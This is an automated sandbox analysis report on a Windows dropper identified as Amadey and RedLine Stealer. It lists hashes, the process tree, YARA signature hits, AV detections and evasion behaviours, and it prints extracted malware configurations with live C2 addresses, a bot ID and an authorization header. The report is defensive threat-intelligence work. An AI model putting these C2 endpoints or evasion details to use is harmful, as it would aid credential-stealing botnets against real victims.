Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
plEnknXWQD.exe

Overview

General Information

Sample Name:plEnknXWQD.exe
Original Sample Name:548ee02a30c2dcca5f3f91e90212ec29.exe
Analysis ID:829681
MD5:548ee02a30c2dcca5f3f91e90212ec29
SHA1:cff21359a3498e3f3e8def5c553a626363b49922
SHA256:3b6171920a1c00a384ac77f88d94b78d960bd317efc531748893edcd579e370e
Tags:exeRedLineStealer
Infos:

Detection

Amadey, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Yara detected Amadeys stealer DLL
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Disable Windows Defender real time protection (registry)
Machine Learning detection for sample
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Disable Windows Defender notifications (registry)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Binary contains a suspicious time stamp
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • plEnknXWQD.exe (PID: 5516 cmdline: C:\Users\user\Desktop\plEnknXWQD.exe MD5: 548EE02A30C2DCCA5F3F91E90212EC29)
    • will6283.exe (PID: 5504 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe MD5: 52B9E7C5A314A3E0BD0AF989586DE77B)
      • will3629.exe (PID: 5480 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe MD5: 7543D15869BB6AF00305F1C7BA4F6B49)
        • will3971.exe (PID: 5456 cmdline: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe MD5: 941C83F4C8AD9D1112BFC556CFA74167)
          • mx8896IL.exe (PID: 5584 cmdline: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe MD5: 7E93BACBBC33E6652E147E7FE07572A0)
          • ns5251Ks.exe (PID: 5660 cmdline: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe MD5: 79CBBF32E2376C4CADB2DFAD0ED320FA)
  • rundll32.exe (PID: 5612 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 1348 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 5284 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 1008 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about 500$ on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": "62.204.41.87/joomla/index.php", "Version": "3.68"}
{"C2 url": "193.233.20.30:4125", "Bot Id": "vint", "Authorization Header": "fb8811912f8370b3d23bffda092d88d0"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\IXP001.TMP\qs5212ER.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    C:\Users\user\AppData\Local\Temp\IXP001.TMP\qs5212ER.exeMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
    • 0x1a440:$pat14: , CommandLine:
    • 0x134ad:$v2_1: ListOfProcesses
    • 0x1328c:$v4_3: base64str
    • 0x13e05:$v4_4: stringKey
    • 0x11b63:$v4_5: BytesToStringConverted
    • 0x10d76:$v4_6: FromBase64
    • 0x12098:$v4_8: procName
    • 0x12814:$v5_5: FileScanning
    • 0x11d6c:$v5_7: RecordHeaderField
    • 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
    C:\Users\user\AppData\Local\Temp\IXP000.TMP\ry40VI69.exeJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
      SourceRuleDescriptionAuthorStrings
      00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
        • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
        • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
        • 0x1300:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
        • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
        • 0x1fdd0:$s5: delete[]
        • 0x1f288:$s6: constructor or from DllMain.
        00000006.00000002.369287641.0000000002E16000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
        • 0x1738:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
        00000006.00000002.368971043.0000000002BF0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000006.00000002.368971043.0000000002BF0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
          • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
          Click to see the 4 entries
          SourceRuleDescriptionAuthorStrings
          6.2.ns5251Ks.exe.400000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            6.2.ns5251Ks.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
            • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
            • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
            • 0x700:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
            • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
            • 0x1e9d0:$s5: delete[]
            • 0x1de88:$s6: constructor or from DllMain.
            6.3.ns5251Ks.exe.2c20000.0.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              6.3.ns5251Ks.exe.2c20000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
              • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
              • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
              • 0x700:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
              • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
              • 0x1e9d0:$s5: delete[]
              • 0x1de88:$s6: constructor or from DllMain.
              6.2.ns5251Ks.exe.400000.0.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                Click to see the 9 entries
                No Sigma rule has matched
                No Snort rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: plEnknXWQD.exeReversingLabs: Detection: 66%
                Source: plEnknXWQD.exeVirustotal: Detection: 52%Perma Link
                Source: plEnknXWQD.exeAvira: detected
                Source: 62.204.41.87/joomla/index.phpVirustotal: Detection: 13%Perma Link
                Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\qs5212ER.exeAvira: detection malicious, Label: HEUR/AGEN.1252166
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exeAvira: detection malicious, Label: HEUR/AGEN.1252166
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ry40VI69.exeReversingLabs: Detection: 83%
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ry40VI69.exeVirustotal: Detection: 84%Perma Link
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exeReversingLabs: Detection: 70%
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exeVirustotal: Detection: 55%Perma Link
                Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\qs5212ER.exeReversingLabs: Detection: 72%
                Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\qs5212ER.exeVirustotal: Detection: 76%Perma Link
                Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exeReversingLabs: Detection: 64%
                Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exeVirustotal: Detection: 55%Perma Link
                Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\py81WM70.exeReversingLabs: Detection: 45%
                Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\py81WM70.exeVirustotal: Detection: 50%Perma Link
                Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exeReversingLabs: Detection: 64%
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exeReversingLabs: Detection: 88%
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeReversingLabs: Detection: 46%
                Source: plEnknXWQD.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\qs5212ER.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ry40VI69.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\py81WM70.exeJoe Sandbox ML: detected
                Source: 00000001.00000003.308015550.0000000004D3E000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: RedLine {"C2 url": "193.233.20.30:4125", "Bot Id": "vint", "Authorization Header": "fb8811912f8370b3d23bffda092d88d0"}
                Source: 0.3.plEnknXWQD.exe.49d9220.0.unpackMalware Configuration Extractor: Amadey {"C2 url": "62.204.41.87/joomla/index.php", "Version": "3.68"}
                Source: C:\Users\user\Desktop\plEnknXWQD.exeCode function: 0_2_00382F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00382F1D
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exeCode function: 1_2_01062F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,1_2_01062F1D
                Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exeCode function: 2_2_00AC2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,2_2_00AC2F1D
                Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exeCode function: 3_2_002F2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,3_2_002F2F1D

                Compliance

                barindex
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeUnpacked PE file: 6.2.ns5251Ks.exe.400000.0.unpack
                Source: plEnknXWQD.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: plEnknXWQD.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                Source: Binary string: wextract.pdb source: plEnknXWQD.exe, will3971.exe.2.dr, will6283.exe.0.dr, will3629.exe.1.dr
                Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: plEnknXWQD.exe, 00000000.00000003.307182274.0000000004904000.00000004.00000020.00020000.00000000.sdmp, ry40VI69.exe.0.dr
                Source: Binary string: Healer.pdb source: ns5251Ks.exe, 00000006.00000003.338894865.0000000002E6F000.00000004.00000020.00020000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.369220126.0000000002D50000.00000004.08000000.00040000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.370344003.0000000004BD1000.00000004.00000800.00020000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.371166445.0000000007090000.00000004.08000000.00040000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.369448631.0000000004690000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wextract.pdbGCTL source: plEnknXWQD.exe, will3971.exe.2.dr, will6283.exe.0.dr, will3629.exe.1.dr
                Source: Binary string: <C:\zarepot\talotoyuy1\guf.pdb source: will3629.exe, 00000002.00000003.308857846.00000000049B0000.00000004.00000020.00020000.00000000.sdmp, py81WM70.exe.2.dr
                Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: will3971.exe, 00000003.00000003.309941661.00000000047F1000.00000004.00000020.00020000.00000000.sdmp, mx8896IL.exe, 00000004.00000000.310427980.0000000000E02000.00000002.00000001.01000000.00000007.sdmp, mx8896IL.exe.3.dr
                Source: Binary string: C:\tugiwozexe-hon68\xozutuboreja.pdb source: will3971.exe, 00000003.00000003.309941661.00000000047F1000.00000004.00000020.00020000.00000000.sdmp, ns5251Ks.exe, 00000006.00000000.335153117.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, ns5251Ks.exe.3.dr
                Source: Binary string: _.pdb source: ns5251Ks.exe, 00000006.00000003.338894865.0000000002E6F000.00000004.00000020.00020000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.369220126.0000000002D50000.00000004.08000000.00040000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.370344003.0000000004BD1000.00000004.00000800.00020000.00000000.sdmp, ns5251Ks.exe, 00000006.00000003.346539295.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.369448631.0000000004690000.00000004.00000020.00020000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.369340692.0000000002E81000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\zarepot\talotoyuy1\guf.pdb source: will3629.exe, 00000002.00000003.308857846.00000000049B0000.00000004.00000020.00020000.00000000.sdmp, py81WM70.exe.2.dr
                Source: Binary string: Healer.pdbH5 source: ns5251Ks.exe, 00000006.00000003.338894865.0000000002E6F000.00000004.00000020.00020000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.369220126.0000000002D50000.00000004.08000000.00040000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.370344003.0000000004BD1000.00000004.00000800.00020000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.371166445.0000000007090000.00000004.08000000.00040000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.369448631.0000000004690000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\plEnknXWQD.exeCode function: 0_2_00382390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00382390
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exeCode function: 1_2_01062390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_01062390
                Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exeCode function: 2_2_00AC2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_00AC2390
                Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exeCode function: 3_2_002F2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,3_2_002F2390

                Networking

                barindex
                Source: Malware configuration extractorURLs: 62.204.41.87/joomla/index.php
                Source: Malware configuration extractorURLs: 193.233.20.30:4125
                Source: will6283.exe, 00000001.00000003.308015550.0000000004D3E000.00000004.00000020.00020000.00000000.sdmp, qs5212ER.exe.1.drString found in binary or memory: https://api.ip.sb/ip
                Source: ns5251Ks.exe, 00000006.00000002.369263476.0000000002DFA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                System Summary

                barindex
                Source: 6.2.ns5251Ks.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 6.3.ns5251Ks.exe.2c20000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 6.2.ns5251Ks.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 1.3.will6283.exe.4deee20.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 6.2.ns5251Ks.exe.2bf0e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 1.3.will6283.exe.4deee20.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 00000006.00000002.369287641.0000000002E16000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000006.00000002.368971043.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000006.00000003.336833965.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\qs5212ER.exe, type: DROPPEDMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: plEnknXWQD.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 6.2.ns5251Ks.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 6.3.ns5251Ks.exe.2c20000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 6.2.ns5251Ks.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 1.3.will6283.exe.4deee20.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 6.2.ns5251Ks.exe.2bf0e67.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 1.3.will6283.exe.4deee20.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 00000006.00000002.369287641.0000000002E16000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000006.00000002.368971043.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000006.00000003.336833965.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\qs5212ER.exe, type: DROPPEDMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: C:\Users\user\Desktop\plEnknXWQD.exeCode function: 0_2_00381F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_00381F90
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exeCode function: 1_2_01061F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_01061F90
                Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exeCode function: 2_2_00AC1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,2_2_00AC1F90
                Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exeCode function: 3_2_002F1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,3_2_002F1F90
                Source: C:\Users\user\Desktop\plEnknXWQD.exeCode function: 0_2_00383BA20_2_00383BA2
                Source: C:\Users\user\Desktop\plEnknXWQD.exeCode function: 0_2_00385C9E0_2_00385C9E
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exeCode function: 1_2_01063BA21_2_01063BA2
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exeCode function: 1_2_01065C9E1_2_01065C9E
                Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exeCode function: 2_2_00AC3BA22_2_00AC3BA2
                Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exeCode function: 2_2_00AC5C9E2_2_00AC5C9E
                Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exeCode function: 3_2_002F3BA23_2_002F3BA2
                Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exeCode function: 3_2_002F5C9E3_2_002F5C9E
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeCode function: 6_2_00408C606_2_00408C60
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeCode function: 6_2_0040DC116_2_0040DC11
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeCode function: 6_2_00407C3F6_2_00407C3F
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeCode function: 6_2_00418CCC6_2_00418CCC
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeCode function: 6_2_00406CA06_2_00406CA0
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeCode function: 6_2_004028B06_2_004028B0
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeCode function: 6_2_0041A4BE6_2_0041A4BE
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeCode function: 6_2_004182446_2_00418244
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeCode function: 6_2_004016506_2_00401650
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeCode function: 6_2_00402F206_2_00402F20
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeCode function: 6_2_004193C46_2_004193C4
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeCode function: 6_2_004187886_2_00418788
